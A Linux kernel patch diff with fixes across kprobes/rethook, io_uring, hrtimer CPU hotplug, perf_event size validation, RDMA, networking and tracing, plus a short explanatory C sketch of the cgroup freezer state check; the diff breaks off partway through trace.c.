+@@ -657,6 +657,7 @@ static inline void dev_iommu_priv_set(struct device *dev, void *priv)
+ 	dev->iommu->priv = priv;
+ }
+ 
++extern struct mutex iommu_probe_device_lock;
+ int iommu_probe_device(struct device *dev);
+ void iommu_release_device(struct device *dev);
+ 
+diff --git a/include/linux/kprobes.h b/include/linux/kprobes.h
+index 85a64cb95d755..8de5d51a0b5e7 100644
+--- a/include/linux/kprobes.h
++++ b/include/linux/kprobes.h
+@@ -140,7 +140,7 @@ static inline bool kprobe_ftrace(struct kprobe *p)
+  *
+  */
+ struct kretprobe_holder {
+-	struct kretprobe	*rp;
++	struct kretprobe __rcu *rp;
+ 	refcount_t		ref;
+ };
+ 
+@@ -202,10 +202,8 @@ extern int arch_trampoline_kprobe(struct kprobe *p);
+ #ifdef CONFIG_KRETPROBE_ON_RETHOOK
+ static nokprobe_inline struct kretprobe *get_kretprobe(struct kretprobe_instance *ri)
+ {
+-	RCU_LOCKDEP_WARN(!rcu_read_lock_any_held(),
+-		"Kretprobe is accessed from instance under preemptive context");
+-
+-	return (struct kretprobe *)READ_ONCE(ri->node.rethook->data);
++	/* rethook::data is a non-changing field, so it can be accessed freely. */
++	return (struct kretprobe *)ri->node.rethook->data;
+ }
+ static nokprobe_inline unsigned long get_kretprobe_retaddr(struct kretprobe_instance *ri)
+ {
+@@ -250,10 +248,7 @@ unsigned long kretprobe_trampoline_handler(struct pt_regs *regs,
+ 
+ static nokprobe_inline struct kretprobe *get_kretprobe(struct kretprobe_instance *ri)
+ {
+-	RCU_LOCKDEP_WARN(!rcu_read_lock_any_held(),
+-		"Kretprobe is accessed from instance under preemptive context");
+-
+-	return READ_ONCE(ri->rph->rp);
++	return rcu_dereference_check(ri->rph->rp, rcu_read_lock_any_held());
+ }
+ 
+ static nokprobe_inline unsigned long get_kretprobe_retaddr(struct kretprobe_instance *ri)
+diff --git a/include/linux/rethook.h b/include/linux/rethook.h
+index bdbe6717f45a2..a00963f33bc14 100644
+--- a/include/linux/rethook.h
++++ b/include/linux/rethook.h
+@@ -29,7 +29,12 @@ typedef void (*rethook_handler_t) (struct rethook_node *, void *, struct pt_regs
+  */
+ struct rethook {
+ 	void			*data;
+-	rethook_handler_t	handler;
++	/*
++	 * To avoid sparse warnings, this uses a raw function pointer with
++	 * __rcu, instead of rethook_handler_t. But this must be the same as
++	 * rethook_handler_t.
++	 */
++	void (__rcu *handler) (struct rethook_node *, void *, struct pt_regs *);
+ 	struct freelist_head	pool;
+ 	refcount_t		ref;
+ 	struct rcu_head		rcu;
+diff --git a/include/linux/stmmac.h b/include/linux/stmmac.h
+index d82ff9fa1a6e8..9f4a4f70270df 100644
+--- a/include/linux/stmmac.h
++++ b/include/linux/stmmac.h
+@@ -172,6 +172,7 @@ struct stmmac_fpe_cfg {
+ 	bool hs_enable;				/* FPE handshake enable */
+ 	enum stmmac_fpe_state lp_fpe_state;	/* Link Partner FPE state */
+ 	enum stmmac_fpe_state lo_fpe_state;	/* Local station FPE state */
++	u32 fpe_csr;				/* MAC_FPE_CTRL_STS reg cache */
+ };
+ 
+ struct stmmac_safety_feature_cfg {
+diff --git a/include/net/genetlink.h b/include/net/genetlink.h
+index 9f97f73615b69..b9e5a22ae3ff9 100644
+--- a/include/net/genetlink.h
++++ b/include/net/genetlink.h
+@@ -12,10 +12,12 @@
+  * struct genl_multicast_group - generic netlink multicast group
+  * @name: name of the multicast group, names are per-family
+  * @flags: GENL_* flags (%GENL_ADMIN_PERM or %GENL_UNS_ADMIN_PERM)
++ * @cap_sys_admin: whether %CAP_SYS_ADMIN is required for binding
+  */
+ struct genl_multicast_group {
+ 	char			name[GENL_NAMSIZ];
+ 	u8			flags;
++	u8			cap_sys_admin:1;
+ };
+ 
+ struct genl_ops;
+diff --git a/include/net/tcp.h b/include/net/tcp.h
+index 19646fdec23dc..c3d56b337f358 100644
+--- a/include/net/tcp.h
++++ b/include/net/tcp.h
+@@ -1460,17 +1460,22 @@ static inline int tcp_full_space(const struct sock *sk)
+ 	return tcp_win_from_space(sk, READ_ONCE(sk->sk_rcvbuf));
+ }
+ 
+-static inline void tcp_adjust_rcv_ssthresh(struct sock *sk)
++static inline void __tcp_adjust_rcv_ssthresh(struct sock *sk, u32 new_ssthresh)
+ {
+ 	int unused_mem = sk_unused_reserved_mem(sk);
+ 	struct tcp_sock *tp = tcp_sk(sk);
+ 
+-	tp->rcv_ssthresh = min(tp->rcv_ssthresh, 4U * tp->advmss);
++	tp->rcv_ssthresh = min(tp->rcv_ssthresh, new_ssthresh);
+ 	if (unused_mem)
+ 		tp->rcv_ssthresh = max_t(u32, tp->rcv_ssthresh,
+ 					 tcp_win_from_space(sk, unused_mem));
+ }
+ 
++static inline void tcp_adjust_rcv_ssthresh(struct sock *sk)
++{
++	__tcp_adjust_rcv_ssthresh(sk, 4U * tcp_sk(sk)->advmss);
++}
++
+ void tcp_cleanup_rbuf(struct sock *sk, int copied);
+ void __tcp_cleanup_rbuf(struct sock *sk, int copied);
+ 
+diff --git a/include/rdma/ib_umem.h b/include/rdma/ib_umem.h
+index 92a673cd9b4fd..77b83ea62dd69 100644
+--- a/include/rdma/ib_umem.h
++++ b/include/rdma/ib_umem.h
+@@ -78,6 +78,13 @@ static inline void __rdma_umem_block_iter_start(struct ib_block_iter *biter,
+ {
+ 	__rdma_block_iter_start(biter, umem->sgt_append.sgt.sgl,
+ 				umem->sgt_append.sgt.nents, pgsz);
++	biter->__sg_advance = ib_umem_offset(umem) & ~(pgsz - 1);
++	biter->__sg_numblocks = ib_umem_num_dma_blocks(umem, pgsz);
++}
++
++static inline bool __rdma_umem_block_iter_next(struct ib_block_iter *biter)
++{
++	return __rdma_block_iter_next(biter) && biter->__sg_numblocks--;
+ }
+ 
+ /**
+@@ -93,7 +100,7 @@ static inline void __rdma_umem_block_iter_start(struct ib_block_iter *biter,
+  */
+ #define rdma_umem_for_each_dma_block(umem, biter, pgsz)                        \
+ 	for (__rdma_umem_block_iter_start(biter, umem, pgsz);                  \
+-	     __rdma_block_iter_next(biter);)
++	     __rdma_umem_block_iter_next(biter);)
+ 
+ #ifdef CONFIG_INFINIBAND_USER_MEM
+ 
+diff --git a/include/rdma/ib_verbs.h b/include/rdma/ib_verbs.h
+index 975d6e9efbcb4..5582509003264 100644
+--- a/include/rdma/ib_verbs.h
++++ b/include/rdma/ib_verbs.h
+@@ -2835,6 +2835,7 @@ struct ib_block_iter {
+ 	/* internal states */
+ 	struct scatterlist *__sg;	/* sg holding the current aligned block */
+ 	dma_addr_t __dma_addr;		/* unaligned DMA address of this block */
++	size_t __sg_numblocks;		/* ib_umem_num_dma_blocks() */
+ 	unsigned int __sg_nents;	/* number of SG entries */
+ 	unsigned int __sg_advance;	/* number of bytes to advance in sg in next step */
+ 	unsigned int __pg_bit;		/* alignment of current block */
+diff --git a/include/uapi/linux/netfilter/nf_tables.h b/include/uapi/linux/netfilter/nf_tables.h
+index 466fd3f4447c2..af8f4c304d272 100644
+--- a/include/uapi/linux/netfilter/nf_tables.h
++++ b/include/uapi/linux/netfilter/nf_tables.h
+@@ -816,12 +816,14 @@ enum nft_exthdr_flags {
+  * @NFT_EXTHDR_OP_TCP: match against tcp options
+  * @NFT_EXTHDR_OP_IPV4: match against ipv4 options
+  * @NFT_EXTHDR_OP_SCTP: match against sctp chunks
++ * @NFT_EXTHDR_OP_DCCP: match against dccp options
+  */
+ enum nft_exthdr_op {
+ 	NFT_EXTHDR_OP_IPV6,
+ 	NFT_EXTHDR_OP_TCPOPT,
+ 	NFT_EXTHDR_OP_IPV4,
+ 	NFT_EXTHDR_OP_SCTP,
++	NFT_EXTHDR_OP_DCCP,
+ 	__NFT_EXTHDR_OP_MAX
+ };
+ #define NFT_EXTHDR_OP_MAX	(__NFT_EXTHDR_OP_MAX - 1)
+diff --git a/io_uring/io_uring.c b/io_uring/io_uring.c
+index f413ebed81ab3..35894955b4549 100644
+--- a/io_uring/io_uring.c
++++ b/io_uring/io_uring.c
+@@ -1377,6 +1377,7 @@ static __cold void io_iopoll_try_reap_events(struct io_ring_ctx *ctx)
+ 	if (!(ctx->flags & IORING_SETUP_IOPOLL))
+ 		return;
+ 
++	percpu_ref_get(&ctx->refs);
+ 	mutex_lock(&ctx->uring_lock);
+ 	while (!wq_list_empty(&ctx->iopoll_list)) {
+ 		/* let it sleep and repeat later if can't complete a request */
+@@ -1394,6 +1395,7 @@ static __cold void io_iopoll_try_reap_events(struct io_ring_ctx *ctx)
+ 		}
+ 	}
+ 	mutex_unlock(&ctx->uring_lock);
++	percpu_ref_put(&ctx->refs);
+ }
+ 
+ static int io_iopoll_check(struct io_ring_ctx *ctx, long min)
+@@ -2800,12 +2802,7 @@ static __cold void io_ring_exit_work(struct work_struct *work)
+ 	init_completion(&exit.completion);
+ 	init_task_work(&exit.task_work, io_tctx_exit_cb);
+ 	exit.ctx = ctx;
+-	/*
+-	 * Some may use context even when all refs and requests have been put,
+-	 * and they are free to do so while still holding uring_lock or
+-	 * completion_lock, see io_req_task_submit(). Apart from other work,
+-	 * this lock/unlock section also waits them to finish.
+-	 */
++
+ 	mutex_lock(&ctx->uring_lock);
+ 	while (!list_empty(&ctx->tctx_list)) {
+ 		WARN_ON_ONCE(time_after(jiffies, timeout));
+diff --git a/io_uring/rsrc.h b/io_uring/rsrc.h
+index d60c758326b42..acaf8dad05401 100644
+--- a/io_uring/rsrc.h
++++ b/io_uring/rsrc.h
+@@ -79,17 +79,10 @@ int io_sqe_files_register(struct io_ring_ctx *ctx, void __user *arg,
+ 
+ int __io_scm_file_account(struct io_ring_ctx *ctx, struct file *file);
+ 
+-#if defined(CONFIG_UNIX)
+-static inline bool io_file_need_scm(struct file *filp)
+-{
+-	return !!unix_get_socket(filp);
+-}
+-#else
+ static inline bool io_file_need_scm(struct file *filp)
+ {
+ 	return false;
+ }
+-#endif
+ 
+ static inline int io_scm_file_account(struct io_ring_ctx *ctx,
+ 				      struct file *file)
+diff --git a/kernel/cgroup/legacy_freezer.c b/kernel/cgroup/legacy_freezer.c
+index 122dacb3a4439..66d1708042a72 100644
+--- a/kernel/cgroup/legacy_freezer.c
++++ b/kernel/cgroup/legacy_freezer.c
+@@ -66,9 +66,15 @@ static struct freezer *parent_freezer(struct freezer *freezer)
+ bool cgroup_freezing(struct task_struct *task)
+ {
+ 	bool ret;
++	unsigned int state;
+ 
+ 	rcu_read_lock();
+-	ret = task_freezer(task)->state & CGROUP_FREEZING;
++	/* Check if the cgroup is still FREEZING, but not FROZEN. The extra
++	 * !FROZEN check is required, because the FREEZING bit is not cleared
++	 * when the state FROZEN is reached.
++	 */
++	state = task_freezer(task)->state;
++	ret = (state & CGROUP_FREEZING) && !(state & CGROUP_FROZEN);
+ 	rcu_read_unlock();
+ 
+ 	return ret;
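
The freezer fix hinges on FREEZING remaining set after FROZEN is reached, so both bits must be tested. A sketch of the check with assumed flag values (the real enum lives in the legacy freezer):

#include <stdio.h>

#define CGROUP_FREEZING_SELF   (1 << 1)
#define CGROUP_FREEZING_PARENT (1 << 2)
#define CGROUP_FROZEN          (1 << 3)
#define CGROUP_FREEZING (CGROUP_FREEZING_SELF | CGROUP_FREEZING_PARENT)

static int is_freezing(unsigned int state)
{
	/* Still in transition only if FREEZING is set and FROZEN is not. */
	return (state & CGROUP_FREEZING) && !(state & CGROUP_FROZEN);
}

int main(void)
{
	printf("%d\n", is_freezing(CGROUP_FREEZING_SELF));                 /* 1 */
	printf("%d\n", is_freezing(CGROUP_FREEZING_SELF | CGROUP_FROZEN)); /* 0 */
	return 0;
}
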
+diff --git a/kernel/cpu.c b/kernel/cpu.c
+index 0e4d362e90825..551468d9c5a85 100644
+--- a/kernel/cpu.c
++++ b/kernel/cpu.c
+@@ -1733,7 +1733,7 @@ static struct cpuhp_step cpuhp_hp_states[] = {
+ 	[CPUHP_HRTIMERS_PREPARE] = {
+ 		.name			= "hrtimers:prepare",
+ 		.startup.single		= hrtimers_prepare_cpu,
+-		.teardown.single	= hrtimers_dead_cpu,
++		.teardown.single	= NULL,
+ 	},
+ 	[CPUHP_SMPCFD_PREPARE] = {
+ 		.name			= "smpcfd:prepare",
+@@ -1800,6 +1800,12 @@ static struct cpuhp_step cpuhp_hp_states[] = {
+ 		.startup.single		= NULL,
+ 		.teardown.single	= smpcfd_dying_cpu,
+ 	},
++	[CPUHP_AP_HRTIMERS_DYING] = {
++		.name			= "hrtimers:dying",
++		.startup.single		= NULL,
++		.teardown.single	= hrtimers_cpu_dying,
++	},
++
+ 	/* Entry state on starting. Interrupts enabled from here on. Transient
+ 	 * state for synchronization */
+ 	[CPUHP_AP_ONLINE] = {
+diff --git a/kernel/events/core.c b/kernel/events/core.c
+index 8f2b9d8b9150e..0193243f65e5c 100644
+--- a/kernel/events/core.c
++++ b/kernel/events/core.c
+@@ -1812,31 +1812,34 @@ static inline void perf_event__state_init(struct perf_event *event)
+ 					      PERF_EVENT_STATE_INACTIVE;
+ }
+ 
+-static void __perf_event_read_size(struct perf_event *event, int nr_siblings)
++static int __perf_event_read_size(u64 read_format, int nr_siblings)
+ {
+ 	int entry = sizeof(u64); /* value */
+ 	int size = 0;
+ 	int nr = 1;
+ 
+-	if (event->attr.read_format & PERF_FORMAT_TOTAL_TIME_ENABLED)
++	if (read_format & PERF_FORMAT_TOTAL_TIME_ENABLED)
+ 		size += sizeof(u64);
+ 
+-	if (event->attr.read_format & PERF_FORMAT_TOTAL_TIME_RUNNING)
++	if (read_format & PERF_FORMAT_TOTAL_TIME_RUNNING)
+ 		size += sizeof(u64);
+ 
+-	if (event->attr.read_format & PERF_FORMAT_ID)
++	if (read_format & PERF_FORMAT_ID)
+ 		entry += sizeof(u64);
+ 
+-	if (event->attr.read_format & PERF_FORMAT_LOST)
++	if (read_format & PERF_FORMAT_LOST)
+ 		entry += sizeof(u64);
+ 
+-	if (event->attr.read_format & PERF_FORMAT_GROUP) {
++	if (read_format & PERF_FORMAT_GROUP) {
+ 		nr += nr_siblings;
+ 		size += sizeof(u64);
+ 	}
+ 
+-	size += entry * nr;
+-	event->read_size = size;
++	/*
++	 * Since perf_event_validate_size() limits this to 16k and inhibits
++	 * adding more siblings, this will never overflow.
++	 */
++	return size + nr * entry;
+ }
+ 
+ static void __perf_event_header_size(struct perf_event *event, u64 sample_type)
+@@ -1886,8 +1889,9 @@ static void __perf_event_header_size(struct perf_event *event, u64 sample_type)
+  */
+ static void perf_event__header_size(struct perf_event *event)
+ {
+-	__perf_event_read_size(event,
+-			       event->group_leader->nr_siblings);
++	event->read_size =
++		__perf_event_read_size(event->attr.read_format,
++				       event->group_leader->nr_siblings);
+ 	__perf_event_header_size(event, event->attr.sample_type);
+ }
+ 
+@@ -1918,24 +1922,35 @@ static void perf_event__id_header_size(struct perf_event *event)
+ 	event->id_header_size = size;
+ }
+ 
++/*
++ * Check that adding an event to the group does not result in anybody
++ * overflowing the 64k event limit imposed by the output buffer.
++ *
++ * Specifically, check that the read_size for the event does not exceed 16k,
++ * read_size being the one term that grows with groups size. Since read_size
++ * depends on per-event read_format, also (re)check the existing events.
++ *
++ * This leaves 48k for the constant size fields and things like callchains,
++ * branch stacks and register sets.
++ */
+ static bool perf_event_validate_size(struct perf_event *event)
+ {
+-	/*
+-	 * The values computed here will be over-written when we actually
+-	 * attach the event.
+-	 */
+-	__perf_event_read_size(event, event->group_leader->nr_siblings + 1);
+-	__perf_event_header_size(event, event->attr.sample_type & ~PERF_SAMPLE_READ);
+-	perf_event__id_header_size(event);
++	struct perf_event *sibling, *group_leader = event->group_leader;
+ 
+-	/*
+-	 * Sum the lot; should not exceed the 64k limit we have on records.
+-	 * Conservative limit to allow for callchains and other variable fields.
+-	 */
+-	if (event->read_size + event->header_size +
+-	    event->id_header_size + sizeof(struct perf_event_header) >= 16*1024)
++	if (__perf_event_read_size(event->attr.read_format,
++				   group_leader->nr_siblings + 1) > 16*1024)
+ 		return false;
+ 
++	if (__perf_event_read_size(group_leader->attr.read_format,
++				   group_leader->nr_siblings + 1) > 16*1024)
++		return false;
++
++	for_each_sibling_event(sibling, group_leader) {
++		if (__perf_event_read_size(sibling->attr.read_format,
++					   group_leader->nr_siblings + 1) > 16*1024)
++			return false;
++	}
++
+ 	return true;
+ }
+ 
+diff --git a/kernel/kprobes.c b/kernel/kprobes.c
+index 3da9726232ff9..dbfddfa86c14e 100644
+--- a/kernel/kprobes.c
++++ b/kernel/kprobes.c
+@@ -2253,7 +2253,7 @@ int register_kretprobe(struct kretprobe *rp)
+ 	if (!rp->rph)
+ 		return -ENOMEM;
+ 
+-	rp->rph->rp = rp;
++	rcu_assign_pointer(rp->rph->rp, rp);
+ 	for (i = 0; i < rp->maxactive; i++) {
+ 		inst = kzalloc(sizeof(struct kretprobe_instance) +
+ 			       rp->data_size, GFP_KERNEL);
+@@ -2314,7 +2314,7 @@ void unregister_kretprobes(struct kretprobe **rps, int num)
+ #ifdef CONFIG_KRETPROBE_ON_RETHOOK
+ 		rethook_free(rps[i]->rh);
+ #else
+-		rps[i]->rph->rp = NULL;
++		rcu_assign_pointer(rps[i]->rph->rp, NULL);
+ #endif
+ 	}
+ 	mutex_unlock(&kprobe_mutex);
+diff --git a/kernel/time/hrtimer.c b/kernel/time/hrtimer.c
+index e4f0e3b0c4f4f..5561dabc9b225 100644
+--- a/kernel/time/hrtimer.c
++++ b/kernel/time/hrtimer.c
+@@ -2216,29 +2216,22 @@ static void migrate_hrtimer_list(struct hrtimer_clock_base *old_base,
+ 	}
+ }
+ 
+-int hrtimers_dead_cpu(unsigned int scpu)
++int hrtimers_cpu_dying(unsigned int dying_cpu)
+ {
+ 	struct hrtimer_cpu_base *old_base, *new_base;
+-	int i;
++	int i, ncpu = cpumask_first(cpu_active_mask);
+ 
+-	BUG_ON(cpu_online(scpu));
+-	tick_cancel_sched_timer(scpu);
++	tick_cancel_sched_timer(dying_cpu);
++
++	old_base = this_cpu_ptr(&hrtimer_bases);
++	new_base = &per_cpu(hrtimer_bases, ncpu);
+ 
+-	/*
+-	 * this BH disable ensures that raise_softirq_irqoff() does
+-	 * not wakeup ksoftirqd (and acquire the pi-lock) while
+-	 * holding the cpu_base lock
+-	 */
+-	local_bh_disable();
+-	local_irq_disable();
+-	old_base = &per_cpu(hrtimer_bases, scpu);
+-	new_base = this_cpu_ptr(&hrtimer_bases);
+ 	/*
+ 	 * The caller is globally serialized and nobody else
+ 	 * takes two locks at once, deadlock is not possible.
+ 	 */
+-	raw_spin_lock(&new_base->lock);
+-	raw_spin_lock_nested(&old_base->lock, SINGLE_DEPTH_NESTING);
++	raw_spin_lock(&old_base->lock);
++	raw_spin_lock_nested(&new_base->lock, SINGLE_DEPTH_NESTING);
+ 
+ 	for (i = 0; i < HRTIMER_MAX_CLOCK_BASES; i++) {
+ 		migrate_hrtimer_list(&old_base->clock_base[i],
+@@ -2249,15 +2242,13 @@ int hrtimers_dead_cpu(unsigned int scpu)
+ 	 * The migration might have changed the first expiring softirq
+ 	 * timer on this CPU. Update it.
+ 	 */
+-	hrtimer_update_softirq_timer(new_base, false);
++	__hrtimer_get_next_event(new_base, HRTIMER_ACTIVE_SOFT);
++	/* Tell the other CPU to retrigger the next event */
++	smp_call_function_single(ncpu, retrigger_next_event, NULL, 0);
+ 
+-	raw_spin_unlock(&old_base->lock);
+ 	raw_spin_unlock(&new_base->lock);
++	raw_spin_unlock(&old_base->lock);
+ 
+-	/* Check, if we got expired work to do */
+-	__hrtimer_peek_ahead_timers();
+-	local_irq_enable();
+-	local_bh_enable();
+ 	return 0;
+ }
+ 
+diff --git a/kernel/trace/rethook.c b/kernel/trace/rethook.c
+index 468006cce7cae..3686626b52c57 100644
+--- a/kernel/trace/rethook.c
++++ b/kernel/trace/rethook.c
+@@ -63,7 +63,7 @@ static void rethook_free_rcu(struct rcu_head *head)
+  */
+ void rethook_stop(struct rethook *rh)
+ {
+-	WRITE_ONCE(rh->handler, NULL);
++	rcu_assign_pointer(rh->handler, NULL);
+ }
+ 
+ /**
+@@ -78,11 +78,17 @@ void rethook_stop(struct rethook *rh)
+  */
+ void rethook_free(struct rethook *rh)
+ {
+-	WRITE_ONCE(rh->handler, NULL);
++	rethook_stop(rh);
+ 
+ 	call_rcu(&rh->rcu, rethook_free_rcu);
+ }
+ 
++static inline rethook_handler_t rethook_get_handler(struct rethook *rh)
++{
++	return (rethook_handler_t)rcu_dereference_check(rh->handler,
++							rcu_read_lock_any_held());
++}
++
+ /**
+  * rethook_alloc() - Allocate struct rethook.
+  * @data: a data to pass the @handler when hooking the return.
+@@ -102,7 +108,7 @@ struct rethook *rethook_alloc(void *data, rethook_handler_t handler)
+ 	}
+ 
+ 	rh->data = data;
+-	rh->handler = handler;
++	rcu_assign_pointer(rh->handler, handler);
+ 	rh->pool.head = NULL;
+ 	refcount_set(&rh->ref, 1);
+ 
+@@ -142,9 +148,10 @@ static void free_rethook_node_rcu(struct rcu_head *head)
+  */
+ void rethook_recycle(struct rethook_node *node)
+ {
+-	lockdep_assert_preemption_disabled();
++	rethook_handler_t handler;
+ 
+-	if (likely(READ_ONCE(node->rethook->handler)))
++	handler = rethook_get_handler(node->rethook);
++	if (likely(handler))
+ 		freelist_add(&node->freelist, &node->rethook->pool);
+ 	else
+ 		call_rcu(&node->rcu, free_rethook_node_rcu);
+@@ -160,11 +167,9 @@ NOKPROBE_SYMBOL(rethook_recycle);
+  */
+ struct rethook_node *rethook_try_get(struct rethook *rh)
+ {
+-	rethook_handler_t handler = READ_ONCE(rh->handler);
++	rethook_handler_t handler = rethook_get_handler(rh);
+ 	struct freelist_node *fn;
+ 
+-	lockdep_assert_preemption_disabled();
+-
+ 	/* Check whether @rh is going to be freed. */
+ 	if (unlikely(!handler))
+ 		return NULL;
+@@ -312,7 +317,7 @@ unsigned long rethook_trampoline_handler(struct pt_regs *regs,
+ 		rhn = container_of(first, struct rethook_node, llist);
+ 		if (WARN_ON_ONCE(rhn->frame != frame))
+ 			break;
+-		handler = READ_ONCE(rhn->rethook->handler);
++		handler = rethook_get_handler(rhn->rethook);
+ 		if (handler)
+ 			handler(rhn, rhn->rethook->data, regs);
+ 
+diff --git a/kernel/trace/ring_buffer.c b/kernel/trace/ring_buffer.c
+index b7383358c4ea1..c02a4cb879913 100644
+--- a/kernel/trace/ring_buffer.c
++++ b/kernel/trace/ring_buffer.c
+@@ -646,8 +646,8 @@ static inline bool __rb_time_read(rb_time_t *t, u64 *ret, unsigned long *cnt)
+ 
+ 	*cnt = rb_time_cnt(top);
+ 
+-	/* If top and bottom counts don't match, this interrupted a write */
+-	if (*cnt != rb_time_cnt(bottom))
++	/* If top and msb counts don't match, this interrupted a write */
++	if (*cnt != rb_time_cnt(msb))
+ 		return false;
+ 
+ 	/* The shift to msb will lose its cnt bits */
+@@ -3025,22 +3025,19 @@ rb_try_to_discard(struct ring_buffer_per_cpu *cpu_buffer,
+ 			local_read(&bpage->write) & ~RB_WRITE_MASK;
+ 		unsigned long event_length = rb_event_length(event);
+ 
++		/*
++		 * For the before_stamp to be different than the write_stamp
++		 * to make sure that the next event adds an absolute
++		 * value and does not rely on the saved write stamp, which
++		 * is now going to be bogus.
++		 */
++		rb_time_set(&cpu_buffer->before_stamp, 0);
++
+ 		/* Something came in, can't discard */
+ 		if (!rb_time_cmpxchg(&cpu_buffer->write_stamp,
+ 				       write_stamp, write_stamp - delta))
+ 			return 0;
+ 
+-		/*
+-		 * It's possible that the event time delta is zero
+-		 * (has the same time stamp as the previous event)
+-		 * in which case write_stamp and before_stamp could
+-		 * be the same. In such a case, force before_stamp
+-		 * to be different than write_stamp. It doesn't
+-		 * matter what it is, as long as its different.
+-		 */
+-		if (!delta)
+-			rb_time_set(&cpu_buffer->before_stamp, 0);
+-
+ 		/*
+ 		 * If an event were to come in now, it would see that the
+ 		 * write_stamp and the before_stamp are different, and assume
+diff --git a/kernel/trace/trace.c b/kernel/trace/trace.c
+index ddcfc78e93e00..d2db4d6f0f2fd 100644
+--- a/kernel/trace/trace.c
++++ b/kernel/trace/trace.c
+@@ -2297,13 +2297,7 @@ int is_tracing_stopped(void)
+ 	return global_trace.stop_count;
+ }
+ 
+-/**
+- * tracing_start - quick start of the tracer
+- *
+- * If tracing is enabled but was stopped by tracing_stop,
+- * this will start the tracer back up.
+- */
+-void tracing_start(void)
++static void tracing_start_tr(struct trace_array *tr)
+ {
+ 	struct trace_buffer *buffer;
+ 	unsigned long flags;
+@@ -2311,119 +2305,83 @@ void tracing_start(void)
+ 	if (tracing_disabled)
+ 		return;
+ 
+-	raw_spin_lock_irqsave(&global_trace.start_lock, flags);
+-	if (--global_trace.stop_count) {
+-		if (global_trace.stop_count < 0) {
++	raw_spin_lock_irqsave(&tr->start_lock, flags);
++	if (--tr->stop_count) {
++		if (WARN_ON_ONCE(tr->stop_count < 0)) {
+ 			/* Someone screwed up their debugging */
+-			WARN_ON_ONCE(1);
+-			global_trace.stop_count = 0;
++			tr->stop_count = 0;
+ 		}
+ 		goto out;
+ 	}
+ 
+ 	/* Prevent the buffers from switching */
+-	arch_spin_lock(&global_trace.max_lock);
++	arch_spin_lock(&tr->max_lock);
+ 
+-	buffer = global_trace.array_buffer.buffer;
++	buffer = tr->array_buffer.buffer;
+ 	if (buffer)
+ 		ring_buffer_record_enable(buffer);
+ 
+ #ifdef CONFIG_TRACER_MAX_TRACE
+-	buffer = global_trace.max_buffer.buffer;
++	buffer = tr->max_buffer.buffer;
+ 	if (buffer)
+ 		ring_buffer_record_enable(buffer);
+ #endif
+ 
+-	arch_spin_unlock(&global_trace.max_lock);
+-
+- out:
+-	raw_spin_unlock_irqrestore(&global_trace.start_lock, flags);
+-}
+-
+-static void tracing_start_tr(struct trace_array *tr)
+-{
+-	struct trace_buffer *buffer;
+-	unsigned long flags;
+-
+-	if (tracing_disabled)
+-		return;
+-
+-	/* If global, we need to also start the max tracer */
+-	if (tr->flags & TRACE_ARRAY_FL_GLOBAL)
+-		return tracing_start();
+-
+-	raw_spin_lock_irqsave(&tr->start_lock, flags);
+-
+-	if (--tr->stop_count) {
+-		if (tr->stop_count < 0) {
+-			/* Someone screwed up their debugging */
+-			WARN_ON_ONCE(1);
+-			tr->stop_count = 0;
+-		}
+-		goto out;
+-	}
+-
+-	buffer = tr->array_buffer.buffer;
+-	if (buffer)
+-		ring_buffer_record_enable(buffer);
++	arch_spin_unlock(&tr->max_lock);
+ 
+  out:
+ 	raw_spin_unlock_irqrestore(&tr->start_lock, flags);
+ }
+ 
+ /**
+- * tracing_stop - quick stop of the tracer
++ * tracing_start - quick start of the tracer
+  *
+- * Light weight way to stop tracing. Use in conjunction with
+- * tracing_start.
++ * If tracing is enabled but was stopped by tracing_stop,
++ * this will start the tracer back up.
+  */
+-void tracing_stop(void)
++void tracing_start(void)
++
++{
++	return tracing_start_tr(&global_trace);
++}
++
++static void tracing_stop_tr(struct trace_array *tr)
+ {
+ 	struct trace_buffer *buffer;
+ 	unsigned long flags;
+ 
+-	raw_spin_lock_irqsave(&global_trace.start_lock, flags);
+-	if (global_trace.stop_count++)
++	raw_spin_lock_irqsave(&tr->start_lock, flags);
++	if (tr->stop_count++)
+ 		goto out;
+ 
+ 	/* Prevent the buffers from switching */
+-	arch_spin_lock(&global_trace.max_lock);
++	arch_spin_lock(&tr->max_lock);
+ 
+-	buffer = global_trace.array_buffer.buffer;
++	buffer = tr->array_buffer.buffer;
+ 	if (buffer)
+ 		ring_buffer_record_disable(buffer);
+ 
+ #ifdef CONFIG_TRACER_MAX_TRACE
+-	buffer = global_trace.max_buffer.buffer;
++	buffer = tr->max_buffer.buffer;
+ 	if (buffer)
+ 		ring_buffer_record_disable(buffer);
+ #endif
+ 
+-	arch_spin_unlock(&global_trace.max_lock);
++	arch_spin_unlock(&tr->max_lock);
+ 
+  out:
+-	raw_spin_unlock_irqrestore(&global_trace.start_lock, flags);
++	raw_spin_unlock_irqrestore(&tr->start_lock, flags);
+ }
+ 
+-static void tracing_stop_tr(struct trace_array *tr)
++/**
++ * tracing_stop - quick stop of the tracer
++ *
++ * Light weight way to stop tracing. Use in conjunction with
++ * tracing_start.
++ */
++void tracing_stop(void)
+ {
+-	struct trace_buffer *buffer;
+-	unsigned long flags;
+-
+-	/* If global, we need to also stop the max tracer */
+-	if (tr->flags & TRACE_ARRAY_FL_GLOBAL)
+-		return tracing_stop();
+-
+-	raw_spin_lock_irqsave(&tr->start_lock, flags);
+-	if (tr->stop_count++)
+-		goto out;
+-
+-	buffer = tr->array_buffer.buffer;
+-	if (buffer)
+-		ring_buffer_record_disable(buffer);
+-
+- out:
+-	raw_spin_unlock_irqrestore(&tr->start_lock, flags);
++	return tracing_stop_tr(&global_trace);
+ }
+ 
+ static int trace_save_cmdline(struct task_struct *tsk)
+@@ -2707,8 +2665,11 @@ void trace_buffered_event_enable(void)
+ 	for_each_tracing_cpu(cpu) {
+ 		page = alloc_pages_node(cpu_to_node(cpu),
+ 					GFP_KERNEL | __GFP_NORETRY, 0);
+-		if (!page)
+-			goto failed;
++		/* This is just an optimization and can handle failures */
++		if (!page) {
++			pr_err("Failed to allocate event buffer\n");
++			break;
++		}
+ 
+ 		event = page_address(page);
+ 		memset(event, 0, sizeof(*event));
+@@ -2722,10 +2683,6 @@ void trace_buffered_event_enable(void)
+ 			WARN_ON_ONCE(1);
+ 		preempt_enable();
+ 	}
+-
+-	return;
+- failed:
+-	trace_buffered_event_disable();
+ }
+ 
+ static void enable_trace_buffered_event(void *data)
+@@ -2760,11 +2717,9 @@ void trace_buffered_event_disable(void)
+ 	if (--trace_buffered_event_ref)
+ 		return;
+ 
+-	preempt_disable();
+ 	/* For each CPU, set the buffer as used. */
+-	smp_call_function_many(tracing_buffer_mask,
+-			       disable_trace_buffered_event, NULL, 1);
